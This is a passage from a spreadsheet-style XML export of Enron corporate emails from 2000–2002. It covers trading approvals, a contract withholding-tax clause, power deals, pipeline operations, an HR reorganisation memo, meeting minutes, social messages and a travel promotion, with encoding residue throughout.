Stack/HOU/ECT@ECT, Harry M Collins/HOU/ECT@ECT, David _x000D_
Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, Marie Heard/Enron _x000D_
Communications@Enron Communications, Robbi Rossi/Enron Communications@Enron _x000D_
Communications, John Viverito/Corp/Enron@Enron, Jane McBride/AP/Enron@Enron, _x000D_
Andrea Calo/SA/Enron@Enron, Peter Keohane/CAL/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: EOL approvals, 03-05-01_x000D_
_x000D_
_x000D_
----- Forwarded by Tana Jones/HOU/ECT on 03/06/2001 09:14 AM -----_x000D_
_x000D_
	Walter Guidroz/ENRON@enronXgate_x000D_
	03/05/2001 05:32 PM_x000D_
		 _x000D_
		 To: Karen Lambert/HOU/ECT@ECT, Tana Jones/HOU/ECT@ECT, Samuel _x000D_
Schott/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Brant Reves/ENRON@enronXgate, _x000D_
Debbie R Brackett/HOU/ECT@ECT, David Hardy/LON/ECT@ECT, Lesli _x000D_
Campbell/ENRON@enronXgate, Cynthia Clark/ENRON@enronXgate, Enron Europe _x000D_
Global Contracts and Facilities@ENRON, Enron Europe Global _x000D_
CounterParty/LON/ECT@ECT, Stephanie Sever/HOU/ECT@ECT, Tom _x000D_
Moran/ENRON@enronXgate, Claudia Clark/HOU/ECT@ECT, William S _x000D_
Bradford/ENRON@enronXgate, Lisa Lees/HOU/ECT@ECT, Juana _x000D_
Fayett/Corp/Enron@Enron, Jana Morse/Corp/Enron@Enron, Trang Le/HOU/ECT@ECT, _x000D_
Paul Maley/LON/ECT@ECT, Sonya Clarke/LON/ECT@ECT, Tim Davies/LON/ECT@ECT, _x000D_
Karen O'Day/NA/Enron@Enron, Tanya Rohauer/ENRON@enronXgate, Kelly _x000D_
Lombardi/NA/Enron@Enron, Brian Lindsay/Enron Communications@Enron _x000D_
Communications, EOL Call Center@ENRON, Bernice Rodriguez/HOU/ECT@ECT, Bill D _x000D_
Hare/HOU/ECT@ect_x000D_
		 cc: _x000D_
		 Subject: EOL approvals, 03-05-01_x000D_
_x000D_
Please see attached._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Jun 2000 10:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: language for Withholding (Section 5.2.2)</t>
  </si>
  <si>
    <t xml:space="preserve">For your review._x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 06/08/2000 05:04 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Jeff Blumenthal@ECT_x000D_
06/06/2000 06:44 PM_x000D_
To: Kay Mann/Corp/Enron@ENRON, Brian D _x000D_
Barto/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Peggy Banczak/HOU/ECT@ECT, Steve Irvin/HOU/ECT@ECT, Marc _x000D_
Sabine/NA/Enron@ENRON _x000D_
_x000D_
Subject: RE: language for Withholding (Section 5.2.2)  _x000D_
_x000D_
Kay and Brian,_x000D_
_x000D_
In reply to Tim Lederach's e-mail below to Jeff Smith on June 6th, I have the _x000D_
following comments:_x000D_
_x000D_
1.  Regarding Tim's addition of the second and third sentences to my original _x000D_
suggested language, it appears that there may be a misunderstanding.  Under _x000D_
Mexican tax law, EEIM would be obligated to withhold tax on any payments it _x000D_
makes to GE that are subject to Mexican withholding tax.  EEIM would submit _x000D_
such amounts directly to the Mexican tax authorities and, in exchange, would _x000D_
receive an official receipt (Official Form 37-A) that it could then forward _x000D_
to GE.  It appears that Tim wants to ensure that GE obtains a copy of the _x000D_
official receipt so that GE can claim a foreign tax credit on its U.S. income _x000D_
tax return for any withholding tax to which payments it receives are subject _x000D_
under Mexican tax law.  Tim's suggested additional language therefore needs _x000D_
to modified to reflect that EEIM would pay the tax and could then provide GE _x000D_
with the receipt.  I'd be glad to visit with Tim to discuss this matter._x000D_
_x000D_
2.  The language that I have proposed should be inserted in both the onshore _x000D_
agreement and the offshore agreement.  Tim is proposing that it be inserted _x000D_
(with his additional suggestions) only in the onshore agreement._x000D_
_x000D_
Please contact me at ext. 35777 if you have any questions._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Jeff_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Kay Mann @ ENRON                           06/06/2000 06:09 PM_x000D_
	_x000D_
_x000D_
To: Jeff Blumenthal/HOU/ECT@ECT, Peggy Banczak/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: RE: language for Withholding (Section 5.2.2)_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 06/06/2000 06:08 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
jeffreye.smith@ps.ge.com on 06/06/2000 06:08:59 PM_x000D_
To: Kay.Mann@enron.com_x000D_
cc: Brian.D.Barto@enron.com, tim.lederach@ps.ge.com, _x000D_
john.schroeder@ps.ge.com, karl.siverling@ps.ge.com _x000D_
_x000D_
Subject: RE: language for Withholding (Section 5.2.2)_x000D_
_x000D_
Kay,_x000D_
See the proposed wording, below.  This is the only contract text issue I am_x000D_
aware of._x000D_
Other than the items mentioned in my e-mail of June 1st/2nd (on the_x000D_
consolidation agreement) and finalization of the "letter agreement" (you got_x000D_
my fax), we are there._x000D_
Implied in the above, is that at this point I think the split agreement_x000D_
approach would get us to closure faster._x000D_
Regards,_x000D_
Jeff Smith_x000D_
_x000D_
-----Original Message-----_x000D_
From:   Lederach, Timothy P (PS, Finance) _x000D_
Sent:   Tuesday, June 06, 2000 4:12 PM_x000D_
To:   Smith, Jeffrey E (PS, CommOps)_x000D_
Subject:   RE: language for Withholding (Section 5.2.2)_x000D_
_x000D_
I have no problem with their proposed addition as it applies to the onshore_x000D_
contract.  However, I would recommend modifying it as follows:_x000D_
_x000D_
      If Purchaser is obligated to make any payment to Seller that_x000D_
is subject to any withholding tax, then Purchaser shall remit the_x000D_
appropriate withholding tax to the proper governmental authorities, and_x000D_
Purchaser shall then remit the net amount of the payment (i.e., the gross_x000D_
payment minus the applicable withholding tax) to Seller.  Seller agrees to_x000D_
provide Purchaser with an original tax receipt, in Seller's name, indicating_x000D_
remittance by the Purchaser of the amounts withheld.  Failure to provide_x000D_
this receipt within a reasonable period of time will result in the amount_x000D_
withheld becoming payable to the Seller._x000D_
Regards_x000D_
_x000D_
Tim Lederach_x000D_
GEPS Taxes_x000D_
_x000D_
_x000D_
      -----Original Message-----_x000D_
      From:   Smith, Jeffrey E (PS, CommOps) _x000D_
      Sent:   Tuesday, June 06, 2000 2:43 PM_x000D_
      To:   Lederach, Timothy P (PS, Finance)_x000D_
      Subject:   FW: language for Withholding (Section 5.2.2)_x000D_
      Importance:   High_x000D_
_x000D_
      Tim,_x000D_
      Enron wants to add this to the end of Clause 5.2.2._x000D_
Attached is the latest version of the On-Shore Contract for reference._x000D_
      Please let me know your opinion._x000D_
      We can talk to Enron about this if appropriate._x000D_
      Thanks,_x000D_
      Jeff Smith_x000D_
          &lt;&lt; File: VITRO5-on-r1b.wpd &gt;&gt;   _x000D_
_x000D_
      -----Original Message-----_x000D_
      From:   Brian D Barto [mailto:Brian.D.Barto@enron.com]_x000D_
&lt;mailto:[mailto:Brian.D.Barto@enron.com]&gt;_x000D_
      Sent:   Tuesday, June 06, 2000 2:23 PM_x000D_
      To:   jeffreye.smith@ps.ge.com_x000D_
      Subject:   language for Withholding (Section 5.2.2)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
      If Purchaser is obligated to make any payment to Seller that_x000D_
is subject to any withholding tax, then Purchaser shall remit the_x000D_
appropriate withholding tax to the proper governmental authorities, and_x000D_
Purchaser shall then remit the net amount of the payment (i.e., the gross_x000D_
payment minus the applicable withholding tax) to Seller._x000D_
      _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 8 May 2001 01:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">hey- i need to change the time....i have to run by my mom's house after i_x000D_
get off so why don't we meet at 7:30. Ok with you??_x000D_
_x000D_
-----Original Message-----_x000D_
From: Matthew.Lenhart@enron.com [mailto:Matthew.Lenhart@enron.com]_x000D_
Sent: Monday, May 07, 2001 3:45 PM_x000D_
To: ASoRelle@h-s.com_x000D_
Subject: RE: FW: RV: Pull!_x000D_
_x000D_
_x000D_
_x000D_
6:30 is fine with me.  i will meet you at the bar._x000D_
</t>
  </si>
  <si>
    <t>Fri, 3 Aug 2001 08:42:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>EPE Lending/Day Ahead Short for Monday</t>
  </si>
  <si>
    <t>For Monday:_x000D_
_x000D_
We're short 25 mw on peak at Palo under STWBOM, 25 mw under STSW. Reduce purchases from El Paso to $4 and sell back to them at $0. Deals are as follows:_x000D_
_x000D_
717316 - STWBOM buys EPE_x000D_
	 HLH/PV_x000D_
	 25 MW @ $76_x000D_
_x000D_
717317 - STWBOM sells STSW_x000D_
	 HLH/PV_x000D_
	 25 MW @ $76_x000D_
_x000D_
717318 - STSW buys EPE_x000D_
	 HLH/PV_x000D_
	 25 MW @ $76_x000D_
_x000D_
Also, STWBOM is short to the day-ahead market 25 mw on peak at SP15 at a price of $68.14._x000D_
_x000D_
Please let me know if you have questions about these procedures._x000D_
_x000D_
Thanks,_x000D_
Kate</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 05:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ljahnke@aerotek.com'})</t>
  </si>
  <si>
    <t>frozenset({'lisa.gillette@enron.com', 'kelbarker@aol.com', 'ashley.a.mace@williams.com', 'corinne_connally@dell.com', 'sscott5@enron.com', 'elaina5@hotmail.com', 'sonderfan@hotmail.com', 'susan_s_edwards@yahoo.com', 'ehillegeist@hotmail.com', 'lwhite@stagestores.com', 'katyhester@hotmail.com', 'lodgesarah@hotmail.com'})</t>
  </si>
  <si>
    <t>Annual Christmas Dinner</t>
  </si>
  <si>
    <t>Hi Girls!_x000D_
It's that time again.  We need to get everyone together for our annual_x000D_
Christmas Dinner.  I have spoken to many of you and tried to come up_x000D_
with a good time for everyone.  Unfortunately, there doesn't seem to be_x000D_
a "perfect day", but how about Friday-Dec. 22nd?  Please respond and_x000D_
tell me what you think.  I have had a few suggestions for a_x000D_
place-Churrasco's, America's, Ruggles, Benji's, Sullivans-please send a_x000D_
suggestion.  Don't say it doesn't matter because majority vote will win_x000D_
and there will be no recount.  The time will probably be around 8 p.m._x000D_
I know the 22nd is close to Christmas, so the 19th has also been_x000D_
suggested-but I am afraid not everyone will be in town yet.  Please send_x000D_
me your thoughts on the day, restauraunt, and if we should plan_x000D_
something after dinner.  I can't wait to see everyone and hope all can_x000D_
make it!_x000D_
-Laura</t>
  </si>
  <si>
    <t>Mon, 25 Feb 2002 11:10:25 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'team.canadian-north@enron.com'})</t>
  </si>
  <si>
    <t>RE: TW Lines</t>
  </si>
  <si>
    <t>We are currently pumping north at P-3 to Mid-continent I/C's and Canadian._x000D_
How are you going to get enough gas to run the pig back to P-3.  We only have _x000D_
29,000 flowing at NNG Beaver today.  If you have any ideas let us know._x000D_
_x000D_
ds_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Canadian-North, Team  _x000D_
Sent:	Monday, February 25, 2002 12:21 PM_x000D_
To:	Schoolcraft, Darrell_x000D_
Cc:	Lowe, Mickey_x000D_
Subject:	RE: TW Lines_x000D_
_x000D_
We need to run the 24" pig from Canadian to P-3.</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 15:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ccryans@westerngas.com'})</t>
  </si>
  <si>
    <t>Re: FW: Your son's first NFL Game</t>
  </si>
  <si>
    <t>Treat as Proprietary._x000D_
Expires After: 12/11/2001 00:00_x000D_
_x000D_
did your boy williams get crippled by that stuff.  I know Whitt was_x000D_
rendered useless._x000D_
_x000D_
CJC</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 12:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'williamsj@iconus.com', 'williams@enron.com'})</t>
  </si>
  <si>
    <t>Re: FW: Inv Meeting / feedback</t>
  </si>
  <si>
    <t>thats awesome babe, congratulations, it doesnt surprise me though</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 11:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: ETS Staff Meeting Schedule Changes for the Remainder of May</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks, John, I will add Sarita to my "cc" list.    And, yes, we'll get both you and Phil on Stan's calendar to go over the "Operations Alliances" topic...I will await their call to schedule._x000D_
_x000D_
Cindy_x000D_
_x000D_
_x000D_
_x000D_
From:	John Shafer/ENRON@enronXgate on 05/15/2001 07:32 PM_x000D_
To:	Stanley Horton/Corp/Enron@Enron_x000D_
cc:	 _x000D_
_x000D_
Subject:	RE: ETS Staff Meeting Schedule Changes for the Remainder of May_x000D_
_x000D_
Cindy,_x000D_
Will you please add my new Administrative Assistant to your future "cc" lists?  She is Sarita Garza.  Thanks so much.  John_x000D_
_x000D_
P.S.  I have asked Sarita and Amelia to get with you and see when a favorable date would be that Phil Lowry and I could have about 30 minutes with Stan to go over the "Operations Alliances" with him (since his half day staff meeting was cancelled for May 16).  Anyway, this is just a heads-up that they will be in touch to get a date confirmed.  Thank you.  JHS_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Stark, Cindy   On Behalf Of Horton, Stanley_x000D_
Sent:	Tuesday, May 15, 2001 11:33 AM_x000D_
To:	Cordes, Bill; Corman, Shelley; Hotte, Steve; Hayslett, Rod; Hartsoe, Joe; Lowry, Phil; Fossum, Drew; McCarty, Danny; Smith, Gary P.; Prentice, James; Vonderheide, Scott; Harris, Steven; Neubauer, Dave; Hayes, Robert; McCoppin, Dorothy; Kilmer III, Robert; Miller, Mary Kay; Pribble, Dan; Nelson, Michel; Rice, Randy; Keller, John; Shafer, John; Peters, Jerry; McGowan, Mike W.; Martin, Jerry D._x000D_
Cc:	Benner, Martha; Winters, Ricki; Rita Houser/GPGFIN/Enron@ENRON; Campos, Kathy; Hawkins, Bernadette; Alder, Amelia; Sellers, Emily; Armstrong, Julie; Perry, Carolyn; Hogan, Janice; Cappiello, Deborah; Alexander, Betty; Kovalcik, Tammy; Solon, Sharon; Paschal, Zelda; Gallishaw, Melinda; Ladish, Kim; Kudym, Judy_x000D_
Subject:	ETS Staff Meeting Schedule Changes for the Remainder of May_x000D_
Importance:	High_x000D_
_x000D_
This is to advise you that we have canceled next Monday's (May 21) 9:15AM ETS Staff Meeting and will resume the following week on Tuesday (May 29) from 9:30 to 11:00AM in 49C2.  _x000D_
_x000D_
NOTE:  Next week, in the absence of our staff meeting, Stan would like you to send him (via electronic mail) brief, updated bullet points._x000D_
_x000D_
Let me know if you have any questions or concerns._x000D_
_x000D_
Thanks,_x000D_
Cindy_x000D_
X36197_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 11:10:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>EnronOnline- Change to Autohedge</t>
  </si>
  <si>
    <t>Effective Monday, October 22, 2001 the following changes will be made to the Autohedge functionality on EnronOnline._x000D_
_x000D_
The volume on the hedge will now respect the minimum volume and volume increment settings on the parent product. See rules below: _x000D_
_x000D_
?	If the transaction volume on the child is less than half of the parent's minimum volume no hedge will occur._x000D_
?	If the transaction volume on the child is more than half the parent's minimum volume but less than half the volume increment on the parent, the hedge will volume will be the parent's minimum volume._x000D_
?	For all other volumes, the same rounding rules will apply based on the volume increment on the parent product._x000D_
_x000D_
Please see example below:_x000D_
_x000D_
Parent's Settings:_x000D_
Minimum: 	5000_x000D_
Increment:  1000_x000D_
_x000D_
Volume on Autohedge transaction			Volume Hedged_x000D_
1      - 2499							0_x000D_
2500 - 5499							5000_x000D_
5500 - 6499							6000</t>
  </si>
  <si>
    <t>Sun, 13 May 2001 11:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Yahoo! News	Edit Breaking News Alerts - Yahoo!_x000D_
	_x000D_
	_x000D_
_x000D_
	Breaking News Alert	 edit_x000D_
ROME _ Media magnate Silvio Berlusconi is projected to win Italian senate, _x000D_
state TV reports. 	_x000D_
	_x000D_
	 [IMAGE]_x000D_
	[IMAGE]_x000D_
		_x000D_
_x000D_
_x000D_
If you no longer wish to receive this alert, click here to unsubscribe._x000D_
If you have questions, send us feedback._x000D_
_x000D_
Copyright , 1994-2001 Yahoo! Inc. All rights reserved. Yahoo Privacy Policy</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 08:40:29 -0800 (PST)</t>
  </si>
  <si>
    <t>fyi._x000D_
_x000D_
-----Original Message-----_x000D_
From: Ordway, Chris _x000D_
Sent: Monday, November 26, 2001 8:15 AM_x000D_
To: Boudreaux, Shanna; Garcia, Clarissa; Lamadrid, Victor; Townsend,_x000D_
Judy; Versen, Victoria_x000D_
Subject: FW: TE Critical System Warning_x000D_
_x000D_
_x000D_
FYI..._x000D_
_x000D_
Chris_x000D_
_x000D_
-----Original Message-----_x000D_
From: infopost@duke-energy.com [mailto:infopost@duke-energy.com]_x000D_
Sent: Monday, November 26, 2001 12:00 AM_x000D_
To: infopost@duke-energy.com_x000D_
Subject: TE Critical System Warning_x000D_
_x000D_
_x000D_
November 26, 2001_x000D_
_x000D_
As indicated by the Critical System Warning issued November 25, 2001,_x000D_
based on anticipated system operations and weather conditions, as stated_x000D_
below, TEXAS EASTERN TRANSMISSION, LP (Texas Eastern) is requiring that_x000D_
all customers take immediate and prompt steps to eliminate excess_x000D_
receipts and conform scheduled receipts to actual deliveries. This_x000D_
system-wide warning is issued as a result of actual receipts into the_x000D_
system significantly exceeding actual deliveries. This Critical System_x000D_
Warning shall remain in place until further notice._x000D_
_x000D_
Weather in the market area continues to be unseasonably mild and_x000D_
shippers have been filling contract storage inventories in anticipation_x000D_
of the coming winter heating season.  At this time, Texas Eastern's_x000D_
storage capacity is approximately 98% full.  As a result, there is_x000D_
virtually no storage capacity or linepack available for system_x000D_
operational purposes and Texas Eastern cannot continue to absorb actual_x000D_
imbalances left on the system._x000D_
_x000D_
Because of the critical nature of this situation and the fact that Texas_x000D_
Eastern no longer has the ability to further absorb imbalances being_x000D_
left on the system, Texas Eastern requests that all customers coordinate_x000D_
with their suppliers the actual quantities received into the system to_x000D_
match actual customer takes in the market area.  No due pipe gas will be_x000D_
accepted into the system until further notice._x000D_
_x000D_
If immediate action does not result in reducing the current volume of_x000D_
gas being left on the system, Texas Eastern may be forced to issue an_x000D_
operational flow order ("OFO") requiring actual receipts of gas to match_x000D_
actual deliveries out of the system, which will be subject to the OFO_x000D_
non-compliance penalty of $25 per dekatherm.  In addition and as_x000D_
provided for in Texas Eastern's FERC Gas Tariff, Texas Eastern will take_x000D_
any other actions as may be necessary to protect the integrity of its_x000D_
system, including, but not limited to, suspension of OBA's._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
*******************************************************************_x000D_
_x000D_
NOTE:_x000D_
_x000D_
Duke Energy Gas Transmission respects your online time and privacy._x000D_
You have received this email because you elected to subscribe. To_x000D_
unsubscribe, login to the E-mail Notification Subscription page at_x000D_
http://www.link.duke-energy.com/script2/Notification.asp_x000D_
uncheck the appropriate checkbox, and click the Submit button.</t>
  </si>
  <si>
    <t>Thu, 27 Dec 2001 10:04:25 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'colleen.raker@enron.com', 'drew.fossum@enron.com'})</t>
  </si>
  <si>
    <t>Ardmore facilities</t>
  </si>
  <si>
    <t>_x000D_
As a follow up to our meeting last week with Colleen on the Ardmore facility, I had a conversation this morningwith Richard Sanders concerning the status of the settlement negotiations with Dynegy concerning Northern Natural Gas. I understand from Richard that part of the settlement will be an agreement that will allow Enron Corp to continue to lease the Ardmore facility as a data center. _x000D_
_x000D_
I just wanted to remind everyone that the lease also needs to allow Enron to provide space to NETCO for its hardware during a transition period until NETCO can relocate its hardware to a new data center. 	The lease also needs to make it clear that access to the Ardmore facility needs to be under Enron's control._x000D_
_x000D_
Similarily the software license that Enron will retain covering all the Enron developed software will also need to provide that Enron can use the covered software to provide services to third parties such as AEP, Bridgeline and Northern Natural Gas.	If anyone has any questions, please give me a call.							_x000D_
_x000D_
Anne C. Koehler_x000D_
Sr. Counsel_x000D_
Enron Wholesale Services_x000D_
1400 Smith Street, EB3839_x000D_
Houston, Texas  77002_x000D_
Phone:  713/853-3448    Fax:  713/646-3393_x000D_
anne.c.koehler@enron.com</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 06:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Minutes from Back Office Services meeting held morning of 3-12</t>
  </si>
  <si>
    <t xml:space="preserve">FYI   -- just so you can see what went on this week, when you return._x000D_
_x000D_
Beth_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Philipson, Fred =20_x000D_
Sent: Monday, March 12, 2001 1:57 PM_x000D_
To: Apollo, Beth; Neuner, Dale; Thomas, Sheri; 'jdenny@enron.com'_x000D_
Cc: Scribner, James; Jafry, Rahil_x000D_
Subject: Minutes from Back Office Services meeting held morning of 3-12_x000D_
_x000D_
All:_x000D_
_x000D_
Here's a summary of our meeting this morning.  As we begin to lay the=20_x000D_
groundwork for this project, I think it's important to summarize our though=_x000D_
ts=20_x000D_
and activities in writing.  If any of you have comments or corrections,=20_x000D_
please feel free._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Fred Philipson_x000D_
5-9323_x000D_
_x000D_
Minutes from Back Office Services meeting held morning of 3-12_x000D_
Attending:_x000D_
James Scribner=09Trans Support=09=09Sheri Thomas=09Trans Support_x000D_
Beth Apollo=09Trans Support=09=09Dale Neuner=09Trans Support_x000D_
Jennifer De Boisblanc=09Trans Support=09=09Fred Philipson=09ENW Origination_x000D_
Objective_x000D_
Enron is sizing up the opportunity to offer internal back office processing=_x000D_
=20_x000D_
services to external clients. Objective of this meeting was to understand t=_x000D_
he=20_x000D_
spreadsheet meant to estimate the potential P&amp;L for this offering._x000D_
Overview_x000D_
Looked at spreadsheet for validation:_x000D_
? Need to better determine the actual market for this service._x000D_
? Need to better understand the current revenue and expense projections and=_x000D_
=20_x000D_
assumptions, expanding on them to include customers not currently with Enro=_x000D_
n._x000D_
Ongoing:_x000D_
Defining the size of the market:_x000D_
? There may be three =01+levels=01, of markets for these services - one for=_x000D_
 energy=20_x000D_
risk mgt. ops (attack first), a larger market if we include global market=_x000D_
=20_x000D_
offerings, and yet a larger market if we think of our offering as transacti=_x000D_
on=20_x000D_
processing, ala ADP._x000D_
? There are a number of ways to derive the potential market size.  The=20_x000D_
current spreadsheet identifies existing customers.  Some may be seeking our=_x000D_
=20_x000D_
services based on their current and projected deal volumes. =20_x000D_
? Fred will continue to analyze the market size(s), adding customers outsid=_x000D_
e=20_x000D_
of current EOL spectrum._x000D_
? Fred will analyze the offerings and pricing structures used by competitor=_x000D_
s.=20_x000D_
? Sheri will get with internal data owners to (in)validate current=20_x000D_
spreadsheet numbers and identify customers with high year-over-year increas=_x000D_
es=20_x000D_
in EOL transaction volume._x000D_
_x000D_
Expenses_x000D_
? James will take a harder look at the expenses.  We wonder if number of=20_x000D_
transactions is the best method to use.  What is the real cost driver?  Whe=_x000D_
re=20_x000D_
are the =01+breaking points=01,, or transaction levels where we must invest=_x000D_
 further=20_x000D_
to offer services to additional customers?_x000D_
_x000D_
Strategy_x000D_
? Beth Apollo will schedule a meeting with Beth Perlman, Jenny Rub, Rahil, =_x000D_
et=20_x000D_
al to discuss ongoing big picture._x000D_
? Beth will also schedule a meeting with Mark Taylor, to include Rahil and=_x000D_
=20_x000D_
Dale.  They will discuss points on the service level agreement that we will=_x000D_
=20_x000D_
use with our external customers._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 8 Jul 2001 10:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>HR Organizational Changes</t>
  </si>
  <si>
    <t xml:space="preserve">In the past few months, Enron has received numerous requests from other=20_x000D_
companies to share some of the processes and systems that we have developed=_x000D_
=20_x000D_
within HR.  Also, several new businesses have been created recently by=20_x000D_
consulting companies to pursue what some financial analysts believe is a hu=_x000D_
ge=20_x000D_
untapped market in aggregating HR services.  Recently, we completed an=20_x000D_
internal review to consider what role Enron could play in this arena and ha=_x000D_
ve=20_x000D_
decided to explore some very specific external opportunities.  Due to the=_x000D_
=20_x000D_
time commitment required to pursue these opportunities, we are assigning=20_x000D_
dedicated resources to this effort.  Effective immediately, the HR communit=_x000D_
y=20_x000D_
will have three major areas of focus that will be working together in order=_x000D_
=20_x000D_
to optimize HR transformation and commercialization.  Taking the lead roles=_x000D_
=20_x000D_
will be myself, Mary Joyce and David Oxley (see below and attached chart)._x000D_
_x000D_
? I will lead this new effort in addition to continuing to lead those areas=_x000D_
=20_x000D_
of HR that are our prime candidates for commercial opportunities.  Reportin=_x000D_
g=20_x000D_
to me on this commercialization effort will be:  Brad Coleman with the=20_x000D_
overall lead; Andrea Yowman who will focus on software applications such as=_x000D_
=20_x000D_
PEP, Expertfinder and Global Compensation; Sarah Davis who will focus on=20_x000D_
Worklife; Elyse Kalmans who will focus on Community Relations; Cynthia Barr=_x000D_
ow=20_x000D_
who will focus on Benefits and Wellness; and Yevgeny Frolov and Dan Brown w=_x000D_
ho=20_x000D_
will focus on E-learning and Talent Management.  I will continue to report =_x000D_
to=20_x000D_
Steve Kean._x000D_
_x000D_
? David Oxley will take the overall lead for HR across all business units=_x000D_
=20_x000D_
focusing on continuing to increase the value HR brings internally to Enron.=_x000D_
 =20_x000D_
The networked recruiting, Organization Development and Training and Busines=_x000D_
s=20_x000D_
Unit Compensation consulting functions, the Global PEP team, as well as the=_x000D_
=20_x000D_
generalist consulting responsibilities for all Corp. groups, will report=20_x000D_
directly to David. The HR leads for EWS, EES, EBS, ETS and EGAS will report=_x000D_
=20_x000D_
jointly to their business unit OTC=01,s and to David from a functional HR=_x000D_
=20_x000D_
perspective. In this regard David will now report to Steve Kean._x000D_
_x000D_
? Mary Joyce will add Global Information Management, Corporate Compensation=_x000D_
=20_x000D_
services and Reporting/ Analysis, to her current Executive Compensation=20_x000D_
responsibilities.  Kathy Schultea, Felecia Acevedo, Cindy Ward and Suzanne=_x000D_
=20_x000D_
Brown will report into Mary=01,s organization. Mary will continue to report=_x000D_
 to=20_x000D_
Steve Kean._x000D_
_x000D_
? With Drew Lynch=01,s promotion to COO Metals and David=01,s increased=20_x000D_
responsibilities, Robert Jones will take the HR lead for EWS Americas. Robe=_x000D_
rt=20_x000D_
will report to the EWS OTC. Jon Chapman has been appointed head of HR for=_x000D_
=20_x000D_
EEL, based in London, and will report to the EEL OTC. Both Robert and Jon=_x000D_
=20_x000D_
will report to David from a functional HR perspective._x000D_
_x000D_
Additional realignment of resources will enable our team to further improve=_x000D_
=20_x000D_
daily employee services, partner with Business Unit initiatives and maximiz=_x000D_
e=20_x000D_
opportunities for commercialization.  These modifications are as follows: =_x000D_
=20_x000D_
_x000D_
? Scott Gilchrist will lead HR for the newly formed EGAS.  As such he will=_x000D_
=20_x000D_
focus his attention on the asset positions in South America, Latin and=20_x000D_
Central America, the Middle East and Asia.  The European assets will contin=_x000D_
ue=20_x000D_
to be a part of EEL.  Scott will also work closely with Rebecca McDonald an=_x000D_
d=20_x000D_
Sandip Mallick in relation to our assets in India.  Scott will report to th=_x000D_
e=20_x000D_
EGAS OTC, Rebecca McDonald and David as above._x000D_
_x000D_
? Michelle Cash has agreed to take the lead of the Corporate OLER function=_x000D_
=20_x000D_
for an interim period to determine how it should operate and be organized. =_x000D_
=20_x000D_
She will report to me for this particular function, but of course will rema=_x000D_
in=20_x000D_
primarily a part of the EWS legal function reporting to Mark Haedicke. =20_x000D_
_x000D_
? Sheila Walton will lead the HR Generalist activities for all Corp=20_x000D_
functions.  Jo Ann Hill, and all of the corporate generalist functions=20_x000D_
currently under Jo Ann, will report to Sheila Walton.  Sheila will continue=_x000D_
=20_x000D_
to report to David._x000D_
_x000D_
? Sarah Davis will add the Click at Home program to her current=20_x000D_
responsibilities, and will continue to report to me._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 19 Feb 2002 00:11:07 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'faretrckr@customermail.expedia.com'})</t>
  </si>
  <si>
    <t>Air/hotel deals from $311: Spring Break is here!</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Kevin,_x000D_
_x000D_
Ah, spring: The time of year when our thoughts turn to ... _x000D_
vacation! Spring will be here before you know it, so start _x000D_
planning your trip now. You've earned it, and we're here to _x000D_
help you find your ultimate getaway. Grab the kids, round _x000D_
up your best friends, or escape with that special someone. _x000D_
We've got a Spring Break option for everyone -- sunny _x000D_
spots, snowy slopes, family fun, and exciting adventures, _x000D_
plus a special section just for singles. Prices start at _x000D_
just $311 for air and hotel, so don't delay -- plan your _x000D_
Spring Break today._x000D_
http://expedia.com/daily/deals/seasonal/springvacation/default.asp?rfrr=-1410 _x000D_
_x000D_
_x000D_
============================================================_x000D_
YOUR FARES _x000D_
============================================================_x000D_
- Houston, TX, United States (IAH-Bush Intercontinental) to Denver, CO, United States (DEN-Denver Intl.) _x000D_
Airlines' lowest published fare: $ 178  (plus tax) _x000D_
http://www.expedia.com/pubspec/scripts/eap.asp?GOTO=FARECALENDAR&amp;FrAirport=DEN&amp;ToAirport=IAH&amp;NumAdult=1&amp;rfrr=-1410&amp;EAPid=8512-1_x000D_
_x000D_
